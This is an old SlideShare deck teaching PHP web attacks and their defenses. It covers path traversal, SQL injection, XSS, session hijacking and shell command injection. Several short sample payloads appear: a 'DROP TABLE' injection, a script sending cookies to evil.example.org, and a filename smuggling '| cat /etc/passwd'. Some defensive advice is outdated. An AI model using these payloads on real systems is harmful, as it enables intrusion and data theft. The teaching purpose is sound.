SlideShare una empresa de Scribd logo

PHP Secure Programming

Balavignesh Kasinathan
Balavignesh Kasinathan

PHP Attacks and Defense. The common web attacks and prevention by using PHP programming.

Software
1 de 39
Descargar para leer sin conexión
1 PHP Attacks and Defense K.Bala Vignesh kbalavignesh@gmail.com
2 Most Secured computer in the WORLD No Need to secure the OS No Need to secure the S/W No need to do Anything It's Naturally Secured
3 Even No Need to Switch ON
4 Web ­Security ? PHP ?
5 Fact : 1 PHP Mainly for Web Programs Fact : 2 Easy To Learn
6 PHP: 20,917,850 domains, 1,224,183 IP addresses Fact : 3 Fact : 4 More Flexible Functions
7 Few Named threats Code Injection SQL Injection Cross Site Script (XSS) Session Hijacking Session Fixation Temp Files abuse Remote Execution More and More unNamed threats...
8 Code Injection
Code Injection 9 Dont directly pass the filenames $filename = $_REQUEST['message']; $message = file_get_contents($filename); print $message; This is ok: http://example.com/myscript.php?message=hello.txt But what if I do like this?: http://example.com/myscript.php?message=passwords.txt
Code Injection 10 This is especially important for includes, require and require_once $module = $_REQUEST['module']; include(“lib/$module”); This is ok: http://example.com/cms?module=login.php But what if I do like this?: http://example.com/cms?module=../passwords.ini
Defense Code Injection 11 Make sure the value is one you expected, if not...ERROR! $requestedModule = $_REQUEST['module']; switch($requestedModule) { case “login”: $module = “login”; break; case “logout”: $module = “logout”; break; default: $module = “error”; }
12 SQL Injection
13 Form to user search .... $username=$_POST['username']; $query= "SELECT * FROM users WHERE name = ' “ .$username." ' ;" If i give , $username ­­­a' or 't'='t Query will be , "SELECT * FROM users WHERE name = ' a' or 't'='t ';" SQL Injection
14 If i give , $username ­­­a'; DROP TABLE users; SELECT * FROM data WHERE name LIKE '% Query will be , SELECT * FROM users WHERE name = ' a';DROP TABLE users; SELECT * FROM data WHERE name LIKE '% '; SQL Injection
15 Use single quotation eg: "select * from users where user= '.$username.'" Check types of user submitted values is_bool(), is_float(), is_numeric(), is_string(), is_int() , intval() , settype() ,strlen() eg: strpos($query , ';') Escape every questionable character in your query ' " , ; ( ) and keywords "FROM", "LIKE", and "WHERE" mysql_real_escape_string SQL Injection Defense
16 magic_quotes_gpc (default – on ) (deprecation – php 6.0) If Off use addslashes If On , If you don't need stripslashes if (get_magic_quotes_gpc()){ $_GET = array_map('stripslashes', $_GET); $_POST = array_map('stripslashes', $_POST); $_COOKIE = array_map('stripslashes', $_COOKIE); } SQL Injection Defense
17 Mysql Improved Extension $query=mysqli_prepare($connection_string, "select * from user where user= ?"); mysqli_stmt_bind_param($query,"s",$username); mysqli_stmt_execute($query); s­string i­integer d­double b­binary PEAR ­DB, DataObject SQL Injection Defense
18 XSS – Cross Site Scripting
19 1.) Inserting scripts <script> document.location = 'http://evil.example.org/steal_cookies.php?cookies=' + document.cookie </script> 2.) Login 3.) Set Cookies 4.) Executes the scripts XSS 5.) Steals the cookies
20 Remote control of the client browser Reveal the value of a cookie Change links on the page Redirect to another URI Render a bogus form or Any undesirable action ... XSS
Defense XSS Encode HTML Entities in All Non­HTML Output 21 htmlentities() Eg: $str = "A 'quote' is <b>bold</b>"; echo htmlentities($str); Outputs Will be ­> A 'quote' is &lt;b&gt;bold&lt;/b&gt; Check the image upload URI (avatar, icon) parse_url Eg: <img src=”http://shopping.example.com/addCart.php?item=123”/> Show the domain name for User submitted Links eg. Not safe ­­> Hey click this to see my photo <a href=”http://badguys.net”>Bala</a> safe ­­> Hey click this to see my photo [badguys.net] Bala
22 Session Hijacking
23 What is Session ID ?
24 Victim Attacker Web Server Session ID= AD238723FD32 Session Hijacking
25 Victim Attacker Web Server Session ID= AD238723FD32 Session ID= AD238723FD32 Session Hijacking
Session Hijacking 26 Network Eavesdropping ­Promiscuous Mode If Intranet ? Use Switch rather than a Hub If wi­fi ? WEP ­Weired Equivalent Privacy If Internet ? SSL
27 Session Hijacking Unwitting Exposure Sending links See this item ­­­­http:// store.com/items.php?item=0987 it's O.K , if i send like this, http://store.com/items.php?item=0987&phpsessid=34223 How to Avoid ? session.use_trans_sid (turned off by default) session.use_only_cookies (Defaults to 1 (enabled) since PHP 6.0.)
28 2.) If he clicks, http://unsafesite?SID=3423 3. Shows login page Victim Session Fixation Attacker Web Server 1.) See this link http://unsafesite?SID=3423 Set SessionID =3423 session_id($_GET['SID']) 4.) Now Full Access http://unsafesite?SID=3423
29 Session Hijacking Defense Use SSL. Use Cookies Instead of $_GET Variables. (ini_set ('session.use_only_cookies',TRUE); ini_set ('session.use_trans_sid',FALSE); Use Session Timeouts ini_set('session.cookie_lifetime',1200) ini_set('session.gc_maxlifetime) Regenerate IDs for Users with Changed Status session_regenerate_id
30 Remote Execution
Remote Execution 31 Injection of Shell commands <?php $filename=$_GET['filename']; $command='/usr/bin/wc $filename”; $words=shell_exec ($command); print “$filename contains $words words.”; ?> This is ok ... wordcount.php?filename=textfile.txt But, What if i give like this ... wordcount.php?filename=%2Fdev%2Fnull%20%7C%20cat%20%2Fetc%2Fpasswd (filename ­­> /dev/null | cat /etc/passwd ) /usr/bin/wc /dev/null |cat /etc/passwd
Remote Execution 32 Defense Allow only Trusted , Human Users to Import Code Store uploads outside of Web Document Root Limit allowable filename extensions for upload Use disable_functions directive eg: disable_functions= “eval,phpinfo” Do not include PHP scripts from Remote Servers eg: <?php include ('http://example.net/code/common.php') ?> Properly escape all shell commands escapeshellarg() , escapeshellcmd()
33 Future? ­PHP 6.0 Deprecation Register Globals Big security hole Safe Mode False sense of security Magic Quotes Messed with the data Upcoming changes and features http://www.php.net/~derick/meeting­notes. html http://www.phphacks.com/content/view/49/33/ Rasmus Lerdorf – PHP 6.0 Wish List http://news.php.net/php.internals/17883
34 What to do? Proper Input Validation Dont do Programming + Security Do secure Programming htmlentities, mysql_real_escape_string, parse_url , addslashes ,escapeshellarg, escapeshellcmd... etc SSL Use PEAR , PECL
Images From Flickr.com 35 reference­http:// flickr.com/photos/opinicus/246099418/ remote_boy ­http:// flickr.com/photo_zoom.gne?id=331355695&size=l level_cross ­http:// flickr.com/photo_zoom.gne?id=67342604&size=o injection3­http:// flickr.com/photos/fleurdelisa/249435636/ building game1­http:// flickr.com/photo_zoom.gne?id=346575350&size=o computer_baby1­http:// flickr.com/photo_zoom.gne?id=102207751&size=o country_border1 ­http:// flickr.com/photo_zoom.gne?id=48740674&size=l computer_baby ­http:// flickr.com/photo_zoom.gne?id=436594815&size=m hijack ­http:// flickr.com/photo_zoom.gne?id=463129891&size=l dog_security ­http:// flickr.com/photo_zoom.gne?id=2205272682&size=l Id card ­http:// flickr.com/photo_zoom.gne?id=1269802640&size=o
36 Reference Pro PHP Security Chris Snyder , Michael Southwell http://wikipedia.org/ http://www.sitepoint.com/article/php­security­blunders http://phpsec.org/ WWW.google.com
37
38
Copyright (c) 2008 Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.2 or any later version published by the Free Software Foundation. http://www.gnu.org/copyleft/fdl.html

Recomendados

PHP Security
PHP SecurityPHP Security
PHP Securitymanugoel2003
 
2013 05-03 - HTML5 & JavaScript Security
2013 05-03 - HTML5 & JavaScript Security2013 05-03 - HTML5 & JavaScript Security
2013 05-03 - HTML5 & JavaScript SecurityJohannes Hoppe
 
Php Security
Php SecurityPhp Security
Php Securityguest7cf35c
 
PHP Security
PHP SecurityPHP Security
PHP SecurityMindfire Solutions
 
Rails and security
Rails and securityRails and security
Rails and securityAndrey Tokarchuk
 
PHP security audits
PHP security auditsPHP security audits
PHP security auditsDamien Seguy
 
Angular js security
Angular js securityAngular js security
Angular js securityJose Manuel Ortega Candel
 
UA testing with Selenium and PHPUnit - TrueNorthPHP 2013
UA testing with Selenium and PHPUnit - TrueNorthPHP 2013UA testing with Selenium and PHPUnit - TrueNorthPHP 2013
UA testing with Selenium and PHPUnit - TrueNorthPHP 2013Michelangelo van Dam
 

Recomendados

PHP Security
PHP SecurityPHP Security
PHP Securitymanugoel2003
 
2013 05-03 - HTML5 & JavaScript Security
2013 05-03 - HTML5 & JavaScript Security2013 05-03 - HTML5 & JavaScript Security
2013 05-03 - HTML5 & JavaScript SecurityJohannes Hoppe
 
Php Security
Php SecurityPhp Security
Php Securityguest7cf35c
 
PHP Security
PHP SecurityPHP Security
PHP SecurityMindfire Solutions
 
Rails and security
Rails and securityRails and security
Rails and securityAndrey Tokarchuk
 
PHP security audits
PHP security auditsPHP security audits
PHP security auditsDamien Seguy
 
Angular js security
Angular js securityAngular js security
Angular js securityJose Manuel Ortega Candel
 
UA testing with Selenium and PHPUnit - TrueNorthPHP 2013
UA testing with Selenium and PHPUnit - TrueNorthPHP 2013UA testing with Selenium and PHPUnit - TrueNorthPHP 2013
UA testing with Selenium and PHPUnit - TrueNorthPHP 2013Michelangelo van Dam
 
End to end web security
End to end web securityEnd to end web security
End to end web securityGeorge Boobyer
 
Learning Dtrace
Learning DtraceLearning Dtrace
Learning DtraceJeongHun Byeon
 
Practical django secuirty
Practical django secuirtyPractical django secuirty
Practical django secuirtyAndy Dai
 
Beyond PHP - it's not (just) about the code
Beyond PHP - it's not (just) about the codeBeyond PHP - it's not (just) about the code
Beyond PHP - it's not (just) about the codeWim Godden
 
Django Web Application Security
Django Web Application SecurityDjango Web Application Security
Django Web Application Securitylevigross
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
SQL Injection in PHP
SQL Injection in PHPSQL Injection in PHP
SQL Injection in PHPDave Ross
 
OWASP Top 10 at International PHP Conference 2014 in Berlin
OWASP Top 10 at International PHP Conference 2014 in BerlinOWASP Top 10 at International PHP Conference 2014 in Berlin
OWASP Top 10 at International PHP Conference 2014 in BerlinTobias Zander
 
Two scoops of Django - Security Best Practices
Two scoops of Django - Security Best PracticesTwo scoops of Django - Security Best Practices
Two scoops of Django - Security Best PracticesSpin Lai
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
OWASP TOP 10 for PHP Programmers
OWASP TOP 10 for PHP ProgrammersOWASP TOP 10 for PHP Programmers
OWASP TOP 10 for PHP Programmersrjsmelo
 
Php101
Php101Php101
Php101Ömer Taşkın
 
When dynamic becomes static: the next step in web caching techniques
When dynamic becomes static: the next step in web caching techniquesWhen dynamic becomes static: the next step in web caching techniques
When dynamic becomes static: the next step in web caching techniquesWim Godden
 
Eight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programsEight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programsAleksandr Yampolskiy
 
WebCamp: Developer Day: Web Security: Cookies, Domains and CORS - Юрий Чайков...
WebCamp: Developer Day: Web Security: Cookies, Domains and CORS - Юрий Чайков...WebCamp: Developer Day: Web Security: Cookies, Domains and CORS - Юрий Чайков...
WebCamp: Developer Day: Web Security: Cookies, Domains and CORS - Юрий Чайков...GeeksLab Odessa
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraMathias Karlsson
 
Code obfuscation, php shells & more
Code obfuscation, php shells & moreCode obfuscation, php shells & more
Code obfuscation, php shells & moreMattias Geniar
 
Concern of Web Application Security
Concern of Web Application SecurityConcern of Web Application Security
Concern of Web Application SecurityMahmud Ahsan
 
Web Application Security with PHP
Web Application Security with PHPWeb Application Security with PHP
Web Application Security with PHPjikbal
 
Secure shell protocol
Secure shell protocolSecure shell protocol
Secure shell protocolBaspally Sai Anirudh
 
Web Application Security: Introduction to common classes of security flaws an...
Web Application Security: Introduction to common classes of security flaws an...Web Application Security: Introduction to common classes of security flaws an...
Web Application Security: Introduction to common classes of security flaws an...Thoughtworks
 

Más contenido relacionado

La actualidad más candente

End to end web security
End to end web securityEnd to end web security
End to end web securityGeorge Boobyer
 
Practical django secuirty
Practical django secuirtyPractical django secuirty
Practical django secuirtyAndy Dai
 
Beyond PHP - it's not (just) about the code
Beyond PHP - it's not (just) about the codeBeyond PHP - it's not (just) about the code
Beyond PHP - it's not (just) about the codeWim Godden
 
Django Web Application Security
Django Web Application SecurityDjango Web Application Security
Django Web Application Securitylevigross
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
SQL Injection in PHP
SQL Injection in PHPSQL Injection in PHP
SQL Injection in PHPDave Ross
 
OWASP Top 10 at International PHP Conference 2014 in Berlin
OWASP Top 10 at International PHP Conference 2014 in BerlinOWASP Top 10 at International PHP Conference 2014 in Berlin
OWASP Top 10 at International PHP Conference 2014 in BerlinTobias Zander
 
Two scoops of Django - Security Best Practices
Two scoops of Django - Security Best PracticesTwo scoops of Django - Security Best Practices
Two scoops of Django - Security Best PracticesSpin Lai
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
OWASP TOP 10 for PHP Programmers
OWASP TOP 10 for PHP ProgrammersOWASP TOP 10 for PHP Programmers
OWASP TOP 10 for PHP Programmersrjsmelo
 
When dynamic becomes static: the next step in web caching techniques
When dynamic becomes static: the next step in web caching techniquesWhen dynamic becomes static: the next step in web caching techniques
When dynamic becomes static: the next step in web caching techniquesWim Godden
 
Eight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programsEight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programsAleksandr Yampolskiy
 
WebCamp: Developer Day: Web Security: Cookies, Domains and CORS - Юрий Чайков...
WebCamp: Developer Day: Web Security: Cookies, Domains and CORS - Юрий Чайков...WebCamp: Developer Day: Web Security: Cookies, Domains and CORS - Юрий Чайков...
WebCamp: Developer Day: Web Security: Cookies, Domains and CORS - Юрий Чайков...GeeksLab Odessa
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraMathias Karlsson
 
Code obfuscation, php shells & more
Code obfuscation, php shells & moreCode obfuscation, php shells & more
Code obfuscation, php shells & moreMattias Geniar
 
Concern of Web Application Security
Concern of Web Application SecurityConcern of Web Application Security
Concern of Web Application SecurityMahmud Ahsan
 

La actualidad más candente (19)

End to end web security
End to end web securityEnd to end web security
End to end web security
 
Learning Dtrace
Learning DtraceLearning Dtrace
Learning Dtrace
 
Practical django secuirty
Practical django secuirtyPractical django secuirty
Practical django secuirty
 
Beyond PHP - it's not (just) about the code
Beyond PHP - it's not (just) about the codeBeyond PHP - it's not (just) about the code
Beyond PHP - it's not (just) about the code
 
Django Web Application Security
Django Web Application SecurityDjango Web Application Security
Django Web Application Security
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
 
SQL Injection in PHP
SQL Injection in PHPSQL Injection in PHP
SQL Injection in PHP
 
OWASP Top 10 at International PHP Conference 2014 in Berlin
OWASP Top 10 at International PHP Conference 2014 in BerlinOWASP Top 10 at International PHP Conference 2014 in Berlin
OWASP Top 10 at International PHP Conference 2014 in Berlin
 
Two scoops of Django - Security Best Practices
Two scoops of Django - Security Best PracticesTwo scoops of Django - Security Best Practices
Two scoops of Django - Security Best Practices
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
 
OWASP TOP 10 for PHP Programmers
OWASP TOP 10 for PHP ProgrammersOWASP TOP 10 for PHP Programmers
OWASP TOP 10 for PHP Programmers
 
Php101
Php101Php101
Php101
 
When dynamic becomes static: the next step in web caching techniques
When dynamic becomes static: the next step in web caching techniquesWhen dynamic becomes static: the next step in web caching techniques
When dynamic becomes static: the next step in web caching techniques
 
Eight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programsEight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programs
 
WebCamp: Developer Day: Web Security: Cookies, Domains and CORS - Юрий Чайков...
WebCamp: Developer Day: Web Security: Cookies, Domains and CORS - Юрий Чайков...WebCamp: Developer Day: Web Security: Cookies, Domains and CORS - Юрий Чайков...
WebCamp: Developer Day: Web Security: Cookies, Domains and CORS - Юрий Чайков...
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPra
 
Code obfuscation, php shells & more
Code obfuscation, php shells & moreCode obfuscation, php shells & more
Code obfuscation, php shells & more
 
Concern of Web Application Security
Concern of Web Application SecurityConcern of Web Application Security
Concern of Web Application Security
 

Destacado

Web Application Security with PHP
Web Application Security with PHPWeb Application Security with PHP
Web Application Security with PHPjikbal
 
Web Application Security: Introduction to common classes of security flaws an...
Web Application Security: Introduction to common classes of security flaws an...Web Application Security: Introduction to common classes of security flaws an...
Web Application Security: Introduction to common classes of security flaws an...Thoughtworks
 
Practical Example of grep command in unix
Practical Example of grep command in unixPractical Example of grep command in unix
Practical Example of grep command in unixJavin Paul
 
Sed & awk the dynamic duo
Sed & awk the dynamic duoSed & awk the dynamic duo
Sed & awk the dynamic duoJoshua Thijssen
 
Unix command-line tools
Unix command-line toolsUnix command-line tools
Unix command-line toolsEric Wilson
 
Defeating The Network Security Infrastructure V1.0
Defeating The Network Security Infrastructure V1.0Defeating The Network Security Infrastructure V1.0
Defeating The Network Security Infrastructure V1.0Philippe Bogaerts
 
Unix Command Line Productivity Tips
Unix Command Line Productivity TipsUnix Command Line Productivity Tips
Unix Command Line Productivity TipsKeith Bennett
 
Learning sed and awk
Learning sed and awkLearning sed and awk
Learning sed and awkYogesh Sawant
 
Practical unix utilities for text processing
Practical unix utilities for text processingPractical unix utilities for text processing
Practical unix utilities for text processingAnton Arhipov
 
Secure Shell(ssh)
Secure Shell(ssh)Secure Shell(ssh)
Secure Shell(ssh)Pina Parmar
 
Virtual Security Lab Setup - OWASP Broken Web Apps, Webgoat, & ZAP
Virtual Security Lab Setup - OWASP Broken Web Apps, Webgoat, & ZAPVirtual Security Lab Setup - OWASP Broken Web Apps, Webgoat, & ZAP
Virtual Security Lab Setup - OWASP Broken Web Apps, Webgoat, & ZAPMichael Coates
 
Top 100 Linux Interview Questions and Answers 2014
Top 100 Linux Interview Questions and Answers 2014Top 100 Linux Interview Questions and Answers 2014
Top 100 Linux Interview Questions and Answers 2014iimjobs and hirist
 
RHCE FINAL Questions and Answers
RHCE FINAL Questions and AnswersRHCE FINAL Questions and Answers
RHCE FINAL Questions and AnswersRadien software
 
Introduction to SSH
Introduction to SSHIntroduction to SSH
Introduction to SSHHemant Shah
 

Destacado (20)

Web Application Security with PHP
Web Application Security with PHPWeb Application Security with PHP
Web Application Security with PHP
 
Secure shell protocol
Secure shell protocolSecure shell protocol
Secure shell protocol
 
Web Application Security: Introduction to common classes of security flaws an...
Web Application Security: Introduction to common classes of security flaws an...Web Application Security: Introduction to common classes of security flaws an...
Web Application Security: Introduction to common classes of security flaws an...
 
How to Setup A Pen test Lab and How to Play CTF
How to Setup A Pen test Lab and How to Play CTF How to Setup A Pen test Lab and How to Play CTF
How to Setup A Pen test Lab and How to Play CTF
 
Practical Example of grep command in unix
Practical Example of grep command in unixPractical Example of grep command in unix
Practical Example of grep command in unix
 
class12_Networking2
class12_Networking2class12_Networking2
class12_Networking2
 
Sed & awk the dynamic duo
Sed & awk the dynamic duoSed & awk the dynamic duo
Sed & awk the dynamic duo
 
Unix command-line tools
Unix command-line toolsUnix command-line tools
Unix command-line tools
 
Defeating The Network Security Infrastructure V1.0
Defeating The Network Security Infrastructure V1.0Defeating The Network Security Infrastructure V1.0
Defeating The Network Security Infrastructure V1.0
 
Unix Command Line Productivity Tips
Unix Command Line Productivity TipsUnix Command Line Productivity Tips
Unix Command Line Productivity Tips
 
Learning sed and awk
Learning sed and awkLearning sed and awk
Learning sed and awk
 
Practical unix utilities for text processing
Practical unix utilities for text processingPractical unix utilities for text processing
Practical unix utilities for text processing
 
Secure SHell
Secure SHellSecure SHell
Secure SHell
 
SSH
SSHSSH
SSH
 
Secure Shell(ssh)
Secure Shell(ssh)Secure Shell(ssh)
Secure Shell(ssh)
 
Virtual Security Lab Setup - OWASP Broken Web Apps, Webgoat, & ZAP
Virtual Security Lab Setup - OWASP Broken Web Apps, Webgoat, & ZAPVirtual Security Lab Setup - OWASP Broken Web Apps, Webgoat, & ZAP
Virtual Security Lab Setup - OWASP Broken Web Apps, Webgoat, & ZAP
 
SSH - Secure Shell
SSH - Secure ShellSSH - Secure Shell
SSH - Secure Shell
 
Top 100 Linux Interview Questions and Answers 2014
Top 100 Linux Interview Questions and Answers 2014Top 100 Linux Interview Questions and Answers 2014
Top 100 Linux Interview Questions and Answers 2014
 
RHCE FINAL Questions and Answers
RHCE FINAL Questions and AnswersRHCE FINAL Questions and Answers
RHCE FINAL Questions and Answers
 
Introduction to SSH
Introduction to SSHIntroduction to SSH
Introduction to SSH
 

Similar a PHP Secure Programming

General Principles of Web Security
General Principles of Web SecurityGeneral Principles of Web Security
General Principles of Web Securityjemond
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009mirahman
 
Securing Java EE Web Apps
Securing Java EE Web AppsSecuring Java EE Web Apps
Securing Java EE Web AppsFrank Kim
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesCarol McDonald
 
Joomla security nuggets
Joomla security nuggetsJoomla security nuggets
Joomla security nuggetsguestbd1cdca
 
12-security.ppt - PHP and Arabic Language - Index
12-security.ppt - PHP and Arabic Language - Index12-security.ppt - PHP and Arabic Language - Index
12-security.ppt - PHP and Arabic Language - Indexwebhostingguy
 
2009 Barcamp Nashville Web Security 101
2009 Barcamp Nashville Web Security 1012009 Barcamp Nashville Web Security 101
2009 Barcamp Nashville Web Security 101brian_dailey
 
Php vulnerability presentation
Php vulnerability presentationPhp vulnerability presentation
Php vulnerability presentationSqa Enthusiast
 
Evolution Of Web Security
Evolution Of Web SecurityEvolution Of Web Security
Evolution Of Web SecurityChris Shiflett
 
Php Security By Mugdha And Anish
Php Security By Mugdha And AnishPhp Security By Mugdha And Anish
Php Security By Mugdha And AnishOSSCube
 
Defending Against Attacks With Rails
Defending Against Attacks With RailsDefending Against Attacks With Rails
Defending Against Attacks With RailsTony Amoyal
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applicationsDevnology
 
Web Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedWeb Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedPrathan Phongthiproek
 
PCI Security Requirements - secure coding
PCI Security Requirements - secure codingPCI Security Requirements - secure coding
PCI Security Requirements - secure codingHaitham Raik
 

Similar a PHP Secure Programming (20)

PHPUG Presentation
PHPUG PresentationPHPUG Presentation
PHPUG Presentation
 
General Principles of Web Security
General Principles of Web SecurityGeneral Principles of Web Security
General Principles of Web Security
 
Web Security 101
Web Security 101Web Security 101
Web Security 101
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009
 
Securing Java EE Web Apps
Securing Java EE Web AppsSecuring Java EE Web Apps
Securing Java EE Web Apps
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security Vulnerabilities
 
Web Security
Web SecurityWeb Security
Web Security
 
Joomla security nuggets
Joomla security nuggetsJoomla security nuggets
Joomla security nuggets
 
12-security.ppt - PHP and Arabic Language - Index
12-security.ppt - PHP and Arabic Language - Index12-security.ppt - PHP and Arabic Language - Index
12-security.ppt - PHP and Arabic Language - Index
 
Security.ppt
Security.pptSecurity.ppt
Security.ppt
 
2009 Barcamp Nashville Web Security 101
2009 Barcamp Nashville Web Security 1012009 Barcamp Nashville Web Security 101
2009 Barcamp Nashville Web Security 101
 
Php vulnerability presentation
Php vulnerability presentationPhp vulnerability presentation
Php vulnerability presentation
 
Evolution Of Web Security
Evolution Of Web SecurityEvolution Of Web Security
Evolution Of Web Security
 
XSS
XSSXSS
XSS
 
ASP.NET Web Security
ASP.NET Web SecurityASP.NET Web Security
ASP.NET Web Security
 
Php Security By Mugdha And Anish
Php Security By Mugdha And AnishPhp Security By Mugdha And Anish
Php Security By Mugdha And Anish
 
Defending Against Attacks With Rails
Defending Against Attacks With RailsDefending Against Attacks With Rails
Defending Against Attacks With Rails
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
Web Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedWeb Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or Succeed
 
PCI Security Requirements - secure coding
PCI Security Requirements - secure codingPCI Security Requirements - secure coding
PCI Security Requirements - secure coding
 

Más de Balavignesh Kasinathan

Más de Balavignesh Kasinathan (6)

John muir
John muirJohn muir
John muir
 
Backbone 4.0
Backbone 4.0Backbone 4.0
Backbone 4.0
 
Introduction to Scrum
Introduction to ScrumIntroduction to Scrum
Introduction to Scrum
 
Introduction to Opensource
Introduction to Opensource Introduction to Opensource
Introduction to Opensource
 
Version Management with CVS
Version Management with CVSVersion Management with CVS
Version Management with CVS
 
Trainer GUI for Tesseract
Trainer GUI for TesseractTrainer GUI for Tesseract
Trainer GUI for Tesseract
 

Último

Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfLearn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfkalichargn70th171
 
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...Health
 
How To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.jsHow To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.jsAndolasoft Inc
 
Optimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTVOptimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTVshikhaohhpro
 
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Steffen Staab
 
Software Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsSoftware Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsArshad QA
 
How To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected WorkerHow To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected WorkerThousandEyes
 
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...harshavardhanraghave
 
TECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providerTECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providermohitmore19
 
Unlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language ModelsUnlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language Modelsaagamshah0812
 
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...OnePlan Solutions
 
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfThe Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfkalichargn70th171
 
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...kellynguyen01
 
5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdfWave PLM
 
Hand gesture recognition PROJECT PPT.pptx
Hand gesture recognition PROJECT PPT.pptxHand gesture recognition PROJECT PPT.pptx
Hand gesture recognition PROJECT PPT.pptxbodapatigopi8531
 
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...ICS
 
Diamond Application Development Crafting Solutions with Precision
Diamond Application Development Crafting Solutions with PrecisionDiamond Application Development Crafting Solutions with Precision
